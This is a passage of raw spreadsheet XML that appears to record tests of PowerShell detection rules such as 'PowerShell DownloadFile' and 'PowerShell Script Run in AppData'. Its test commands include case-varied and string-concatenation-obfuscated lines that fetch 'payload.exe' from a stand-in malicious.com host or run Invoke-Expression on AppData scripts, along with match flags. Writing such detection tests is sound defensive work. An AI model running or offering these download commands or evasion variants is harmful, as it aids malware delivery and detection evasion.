      </c>
      <c r="J2250" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2250" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2251" ht="15.75" customHeight="1" s="42">
      <c r="A2251" s="43" t="n"/>
      <c r="B2251" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C2251" s="44" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D2251" s="44" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E2251" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMand "&amp; {Invoke-Expression (Get-Content $env:APPDATA\script.ps1 -Raw)}"</t>
        </is>
      </c>
      <c r="F2251" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2251" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2251" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2251" s="43" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File (ee218c12-627a-4d27-9e30-d6fb2fe22ed2); Powershell Inline Execution From A File (ee218c12-627a-4d27-9e30-d6fb2fe22ed2)</t>
        </is>
      </c>
      <c r="J2251" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2251" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2252" ht="15.75" customHeight="1" s="42">
      <c r="A2252" s="43" t="n"/>
      <c r="B2252" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C2252" s="44" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D2252" s="44" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E2252" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "&amp; {Invoke-Expression (Get-Content $env:APPDATA\script.ps1 -Raw)}"</t>
        </is>
      </c>
      <c r="F2252" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2252" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2252" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2252" s="43" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File (ee218c12-627a-4d27-9e30-d6fb2fe22ed2); Powershell Inline Execution From A File (ee218c12-627a-4d27-9e30-d6fb2fe22ed2)</t>
        </is>
      </c>
      <c r="J2252" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2252" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2253" ht="15.75" customHeight="1" s="42">
      <c r="A2253" s="43" t="n"/>
      <c r="B2253" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C2253" s="44" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D2253" s="44" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E2253" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMAnd "&amp; {Invoke-Expression (Get-Content $env:APPDATA\script.ps1 -Raw)}"</t>
        </is>
      </c>
      <c r="F2253" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2253" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2253" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2253" s="44" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File (ee218c12-627a-4d27-9e30-d6fb2fe22ed2); Powershell Inline Execution From A File (ee218c12-627a-4d27-9e30-d6fb2fe22ed2)</t>
        </is>
      </c>
      <c r="J2253" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2253" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2254" ht="15.75" customHeight="1" s="42">
      <c r="A2254" s="43" t="n"/>
      <c r="B2254" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C2254" s="44" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D2254" s="44" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E2254" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; {Invoke-Expression (Get-Content $env:APPDATA\script.ps1 -Raw)}"</t>
        </is>
      </c>
      <c r="F2254" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2254" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2254" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2254" s="44" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File (ee218c12-627a-4d27-9e30-d6fb2fe22ed2); Powershell Inline Execution From A File (ee218c12-627a-4d27-9e30-d6fb2fe22ed2)</t>
        </is>
      </c>
      <c r="J2254" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2254" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2255" ht="15.75" customHeight="1" s="42">
      <c r="A2255" s="43" t="n"/>
      <c r="B2255" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C2255" s="44" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D2255" s="44" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E2255" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmAnD "&amp; {Invoke-Expression (Get-Content $env:APPDATA\script.ps1 -Raw)}"</t>
        </is>
      </c>
      <c r="F2255" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2255" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2255" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2255" s="43" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File (ee218c12-627a-4d27-9e30-d6fb2fe22ed2); Powershell Inline Execution From A File (ee218c12-627a-4d27-9e30-d6fb2fe22ed2)</t>
        </is>
      </c>
      <c r="J2255" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2255" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2256" ht="15.75" customHeight="1" s="42">
      <c r="A2256" s="43" t="n"/>
      <c r="B2256" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2256" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2256" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2256" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F2256" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2256" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2256" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2256" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2256" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2256" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2257" ht="15.75" customHeight="1" s="42">
      <c r="A2257" s="43" t="n"/>
      <c r="B2257" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2257" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2257" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2257" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAnD "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F2257" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2257" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2257" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2257" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2257" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2257" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2258" ht="15.75" customHeight="1" s="42">
      <c r="A2258" s="43" t="n"/>
      <c r="B2258" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2258" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2258" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2258" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMManD "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F2258" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2258" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2258" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2258" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2258" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2258" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2259" ht="15.75" customHeight="1" s="42">
      <c r="A2259" s="43" t="n"/>
      <c r="B2259" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2259" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2259" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2259" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F2259" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2259" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2259" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2259" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2259" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2259" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2260" ht="15.75" customHeight="1" s="42">
      <c r="A2260" s="43" t="n"/>
      <c r="B2260" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2260" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2260" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2260" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommaNd "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F2260" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2260" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2260" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2260" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2260" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2260" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2261" ht="15.75" customHeight="1" s="42">
      <c r="A2261" s="43" t="n"/>
      <c r="B2261" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2261" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2261" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2261" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F2261" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2261" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2261" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2261" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2261" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2261" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2262" ht="15.75" customHeight="1" s="42">
      <c r="A2262" s="43" t="n"/>
      <c r="B2262" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2262" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2262" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2262" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F2262" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2262" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2262" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2262" s="44" t="n"/>
      <c r="J2262" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2262" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2263" ht="15.75" customHeight="1" s="42">
      <c r="A2263" s="43" t="n"/>
      <c r="B2263" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2263" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2263" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2263" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAnd "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F2263" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2263" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2263" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2263" s="44" t="n"/>
      <c r="J2263" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2263" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2264" ht="15.75" customHeight="1" s="42">
      <c r="A2264" s="43" t="n"/>
      <c r="B2264" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2264" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2264" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2264" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmANd "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F2264" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2264" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2264" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2264" s="43" t="n"/>
      <c r="J2264" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2264" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2265" ht="15.75" customHeight="1" s="42">
      <c r="A2265" s="43" t="n"/>
      <c r="B2265" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2265" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2265" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2265" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F2265" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2265" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2265" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2265" s="43" t="n"/>
      <c r="J2265" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2265" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2266" ht="15.75" customHeight="1" s="42">
      <c r="A2266" s="43" t="n"/>
      <c r="B2266" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2266" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2266" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2266" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F2266" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2266" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2266" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2266" s="43" t="n"/>
      <c r="J2266" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2266" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2267" ht="15.75" customHeight="1" s="42">
      <c r="A2267" s="43" t="n"/>
      <c r="B2267" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2267" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2267" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2267" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F2267" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2267" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2267" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2267" s="43" t="n"/>
      <c r="J2267" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2267" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2268" ht="15.75" customHeight="1" s="42">
      <c r="A2268" s="43" t="n"/>
      <c r="B2268" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2268" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2268" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2268" s="44" t="inlineStr">
        <is>
          <t>powershell -c "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F2268" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2268" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2268" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2268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68" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2268" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2269" ht="15.75" customHeight="1" s="42">
      <c r="A2269" s="43" t="n"/>
      <c r="B2269" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2269" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2269" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2269" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F2269" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2269" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2269" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2269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69" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2269" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2270" ht="15.75" customHeight="1" s="42">
      <c r="A2270" s="43" t="n"/>
      <c r="B2270" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2270" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2270" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2270" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F2270" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2270" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2270" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2270" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2270" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2270" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2271" ht="15.75" customHeight="1" s="42">
      <c r="A2271" s="43" t="n"/>
      <c r="B2271" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2271" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2271" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2271" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F2271" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2271" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2271" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2271" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2271" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2271" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2272" ht="15.75" customHeight="1" s="42">
      <c r="A2272" s="43" t="n"/>
      <c r="B2272" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2272" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2272" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2272" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -C "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F2272" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2272" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2272" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2272" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2272" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2272" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2273" ht="15.75" customHeight="1" s="42">
      <c r="A2273" s="43" t="n"/>
      <c r="B2273" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2273" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2273" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2273" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F2273" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2273" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2273" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2273" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2273" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2273" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2274" ht="15.75" customHeight="1" s="42">
      <c r="A2274" s="43" t="n"/>
      <c r="B2274" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2274" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2274" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2274" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F2274" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2274" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2274" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2274" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2274" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2274" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2275" ht="15.75" customHeight="1" s="42">
      <c r="A2275" s="43" t="n"/>
      <c r="B2275" s="44" t="inlineStr">
        <is>
